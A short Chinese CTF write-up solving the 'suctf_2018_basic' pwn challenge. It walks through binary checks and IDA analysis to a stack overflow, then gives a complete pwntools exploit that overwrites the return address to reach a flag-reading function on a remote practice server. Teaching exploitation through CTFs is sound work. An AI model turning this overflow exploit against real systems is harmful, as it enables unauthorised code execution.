suctf_2018_basic pwn
附件
步骤
- 例行检查,64位程序,开启了RELRO和NX
![在这里插入图片描述](https://img-blog.csdnimg.cn/20210202105404121.png)
- 试运行一下程序,看看大概的情况
![在这里插入图片描述](https://img-blog.csdnimg.cn/20210202105452628.png)
- 64位ida载入,检索字符串的时候发现了读出flag的函数,flag_addr=0x401157
![在这里插入图片描述](https://img-blog.csdnimg.cn/20210202105643769.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L21jbXV5YW5nYQ==,size_16,color_FFFFFF,t_70)
main()
![在这里插入图片描述](https://img-blog.csdnimg.cn/20210202105837457.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L21jbXV5YW5nYQ==,size_16,color_FFFFFF,t_70)
s存在溢出,简单的覆盖返回地址到后门函数类型的题目
完整exp
from pwn import *
r=remote('node3.buuoj.cn',25779)
flag_addr=0x401157
payload='a'*(0x110+8)+p64(flag_addr)
r.sendline(payload)
r.interactive()
![在这里插入图片描述](https://img-blog.csdnimg.cn/20210202105819514.png)